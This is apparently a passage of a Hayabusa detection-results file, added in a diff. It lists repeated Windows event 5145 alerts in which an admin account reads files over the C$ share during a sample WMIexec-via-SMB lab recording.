+2021-04-22 20:32:30.113 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W3cdb5602#\e3e82e97635cdd0d33dd1fb39ffe5b5f  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.113 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W6c95e797#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.113 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W6c95e797#\4bdb448dffd981eb795d0efeaf81aee9  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.113 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W6dcfceb1#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.128 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W6dcfceb1#\bbfc6bc472afc457c523dc2738248629  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.128 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W7b7c0837#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.128 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W7b7c0837#\294124bd4523f5af19788c4942aeba5e  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.128 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W9e7db7c5#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.128 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W9e7db7c5#\e9ab45e2a1806140421e99300db14933  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.144 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W9e8926d3#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.144 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W9e8926d3#\278d9be2765837ed33460677146f35e8  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.144 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W15cd0137#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.144 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W15cd0137#\82f3f76602a3738000b03df08a71ffe8  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.144 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W37d1a032#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.144 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W37d1a032#\d3293b74965baef61a05323c7ec98d92  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.160 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W39c436dd#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.160 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W39c436dd#\711dbd144f8f71a864ea8493a3877bc5  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.160 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W69ef49d2#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.160 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W69ef49d2#\28242ebb69175640e01f44f44845482c  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.191 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W71daf281#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W71daf281#\be26a3df8bcf20be912896fba8462d2f  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W81a3882f#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W81a3882f#\84ae811d9df57eca1c9728263a6e6aff  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: USERS  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Default\desktop.ini  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Public\desktop.ini  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.222 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W708fc392#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.222 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W708fc392#\4f9e41de8acf7fe60bc43242811fbabd  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.222 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W5052cbb1#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.222 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W5052cbb1#\960951a3fe97e1a2bd2d09ced71ce4f3  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.222 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W57798b05#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.222 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W57798b05#\2145d62276d37b22799a8deb8d44b210  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W73044bb5#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W73044bb5#\fb97af1f4b1eed42372eea20ba746a53  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W193497eb#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W193497eb#\a26561bad24a68eb0217aa9d9fdad386  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W08054466#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W08054466#\50e266485611719e095733dd021e3a42  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wad38fd8b#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wad38fd8b#\44e2747436ee8621f4daf918b1922498  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wad78daf4#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wad78daf4#\748bf388335b4acc7031af4d134ad037  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wb2d030b7#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wb2d030b7#\7dbfc45fb55f5cf738956f4c7b2f8639  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wb9b5bb58#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wb9b5bb58#\789a3b275b1f5369ae5ab066e2461420  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wbc80354b#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wbc80354b#\fac59f632a5e8454549a214641d7bf25  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.269 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wc1cc6649#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.269 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wc1cc6649#\996a8c9071e330fe0cfac06c4d9f2378  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.269 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wca5f1176#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.269 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wca5f1176#\f8b6726fa5f43478af33a92559c0cef2  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.269 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wcffedcb4#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.269 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wcffedcb4#\f6be55d69bb92d49c71a4f9861c21451  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
